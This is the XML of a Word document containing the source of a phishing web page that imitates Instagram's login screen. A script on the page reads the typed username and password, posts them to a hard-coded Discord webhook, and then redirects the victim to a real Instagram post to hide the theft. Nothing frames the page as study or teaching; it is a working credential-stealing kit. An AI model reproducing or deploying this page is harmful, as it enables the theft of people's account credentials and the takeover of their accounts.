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DE312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&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674CEBD9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&lt;link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rel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="Icon" type="image/x-icon" href="https://a-manu.com/wp-content/uploads/sites/171/2017/04/instagram-Logo-PNG-Transparent-Background-download-300x300.png"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D00DA8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&lt;title&gt;Instagram&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CBEF5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&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EAAB4D3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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E7EE2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&lt;span id="root"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA900E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&lt;section class="section-all"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4795500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&lt;link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rel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="stylesheet"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="css.css"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462AE9EA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1-Role Main --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775C8EA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&lt;main class="main" role="main"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D94B93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&lt;div class="wrapper"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F35152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&lt;article class="article"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02794F57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&lt;div class="content"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E56BB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&lt;div class="login-box"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3662EEC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&lt;div class="header"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7027B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class="logo" src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2a/Instagram_logo.svg/1200px-Instagram_logo.svg.png" alt="Instagram"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AFF28A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&lt;/div&gt;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Header end --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F88349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&lt;div class="form-wrap"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD13142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&lt;form class="form"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5B6B1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7295C4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&lt;div class="input-box"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C6E04C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  &lt;input type="text" id="username" placeholder="Phone number, username, or email" aria-required="true"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="30"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autocapitalize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="off" autocorrect="off" name="username" required&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109793C9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&lt;/div&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220D4722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26EB74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&lt;div class="input-box"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C79BCB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  &lt;input type="password" name="password" id="password" placeholder="Password"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="30" aria-required="true"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autocapitalize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="off" autocorrect="off" required&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0548981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&lt;/div&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFE5569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41F6E7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&lt;span class="button-box"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DCC1F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  &lt;button class="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" type="button" name="submit" onclick="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)"&gt;Log in&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3409DD33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&lt;/span&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7977B767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0C3EE5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&lt;a class="forgot"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="https://www.instagram.com/accounts/password/reset"&gt;Forgot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password?&lt;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/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779C610A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&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4543B51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Form-wrap end --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5188284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Login-box end --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7DE03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B108A0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&lt;div class="login-box"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548D2BB4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&lt;p class="text"&gt;Don't have an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account?&lt;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="https://www.instagram.com/accounts/emailsignup"&gt;Sign up&lt;/a&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D27274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Signup-box end --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127DB2B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B3E09D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&lt;div class="app"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="160D7F5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&lt;p&gt;Get the app.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDBD40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&lt;div class="app-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"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7262B237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&lt;a href="https://itunes.apple.com/app/instagram/id389801252?pt=428156&amp;amp;ct=igweb.loginPage.badge&amp;amp;mt=8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5BCA5C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src="https://www.instagram.com/static/images/appstore-install-badges/badge_ios_english-en.png/4b70f6fae447.png" &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6F184C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&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3403CC2A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&lt;a href="https://play.google.com/store/apps/details?id=com.instagram.android&amp;amp;referrer=utm_source%3Dinstagramweb%26utm_campaign%3DloginPage%26utm_medium%3Dbadge"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BC35B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  &lt;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src="https://www.instagram.com/static/images/appstore-install-badges/badge_android_english-en.png/f06b908907d5.png"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F65416A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  &lt;/a&gt;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8B3F2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  &lt;/div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&gt;  &lt;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!-- App-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end--&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B016A4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App end --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2056A30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Content end --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B8DB5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&lt;/article&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC49C3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 xml:space="preserve">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Wrapper end --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA98F2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&lt;/main&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE55BE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6028DA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2-Role Footer --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFFE04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&lt;footer class="footer" role="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contentinfo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"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354CFE7B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&lt;div class="footer-container"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65CB8EF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D38BB93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&lt;nav class="footer-nav" role="navigation"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1480DD6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&lt;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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EBB956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  <w:t xml:space="preserve">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=""&gt;&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D60A04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="https://about.instagram.com"&gt;About Us&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF2E08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="https://help.instagram.com"&gt;Support&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369B5442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="https://about.instagram.com/blog"&gt;Blog&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFC45E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href="https://about.instagram.com/about-us/careers"&gt;Jobs&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C13D97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="https://www.instagram.com/developer"&gt;Api&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708B470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href="https://help.instagram.com/519522125107875"&gt;Privacy&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A30E7B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="https://help.instagram.com/581066165581870"&gt;Terms&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3135D083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  &lt;li&gt;&lt;a href="https://www.instagram.com/directory/hashtags"&gt;Directory&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788D0F8C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  <w:t xml:space="preserve">  &lt;li&gt;&lt;a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=""&gt;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Intsagram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&lt;/a&gt;&lt;/li&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569A658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  &lt;/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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C357C4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&lt;/nav&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEE7FC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AA894B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  &lt;span class="footer-logo"&gt;&amp;copy; 2021 Instagram&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505D01E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  &lt;/div&gt;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Footer container end --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1EA5DB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&lt;/footer&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01CD791C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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ABE3A4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&lt;/section&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5748D47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&lt;/span&gt;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Root --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200B811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464417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Select Link --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45308AE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script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 xml:space="preserve"> type="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/javascript"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724ED3DB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 xml:space="preserve"> la(src) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55225B03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lastRenderedPageBreak/>
        <w:t xml:space="preserve">     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window.location</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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220A7602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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065DDE22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&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1F62B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119FDD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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2AE269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function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) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513CCBC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function sleep(milliseconds) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2462A3B4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const date =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Date.now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72F076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let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currentDate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= null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623B100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do {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE26C5B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currentDate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Date.now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F639F0D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} while (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currentDate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- date &lt; milliseconds);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BD96DD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6F57D32E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var request = new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XMLHttpRequest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174D7224" w14:textId="1AE1AB86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request.open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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("POST", "</w:t>
      </w:r>
      <w:r w:rsidR="00DD3D76" w:rsidRPr="00DD3D76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https://discordapp.com/api/webhooks/1258031535001567263/kZ3voatkGvfkim5z2j1J1uBnOK-d5Tef9pdRmDHiJ7IHDW5xBU6x_45rGlCJJ1dpbeXO</w:t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");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11208E3F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request.setRequestHeader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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('Content-type', 'application/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json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');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FDBF16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var params = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29986B5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  content: ("&gt; **</w:t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USERNAME  :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**" +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document.getElementById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('username').value + "\n&gt; **PASSWORD : **" + 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document.getElementById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('password').value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5759980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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23294431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spellStart"/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request.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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JSON.stringify</w:t>
      </w:r>
      <w:proofErr w:type="spell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(params));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0129DFE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sleep(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400)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7E4035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ab/>
      </w:r>
      <w:proofErr w:type="gramStart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window.location</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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>.replace("https://www.instagram.com/p/By7NkskoTip");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C721510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0F9EC3A8" w14:textId="77777777" w:rsidR="009E4DF0" w:rsidRPr="009E4DF0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 xml:space="preserve">  &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1981DBBA" w14:textId="58C4CA63" w:rsidR="00A11C4F" w:rsidRPr="00A11C4F" w:rsidRDefault="009E4DF0" w:rsidP="009E4DF0">
      <w:pPr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</w:pPr>
      <w:r w:rsidRPr="009E4DF0">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="fr-FR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A11C4F" w:rsidRPr="00A1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2330"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CA2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87B9E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4082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261F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E978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16702">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1667514386">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="136416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B4"/>
    <w:rsid w:val="00090550"/>
    <w:rsid w:val="00117AB4"/>
    <w:rsid w:val="002107A7"/>
    <w:rsid w:val="005106BD"/>
    <w:rsid w:val="007112B9"/>
    <w:rsid w:val="0086494D"/>
    <w:rsid w:val="009E4DF0"/>
    <w:rsid w:val="00A11C4F"/>
    <w:rsid w:val="00BC5468"/>
    <w:rsid w:val="00DD3D76"/>
    <w:rsid w:val="00E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5590"/>
  <w15:docId w15:val="{C3760BD8-E4CE-48B8-BCC5-F0C4818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gapspan">
    <w:name w:val="gapspan"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="00117AB4"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="blau">
    <w:name w:val="blau"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="0011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cp:lastPrinted>2024-01-25T22:31:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-04T09:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-04T09:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>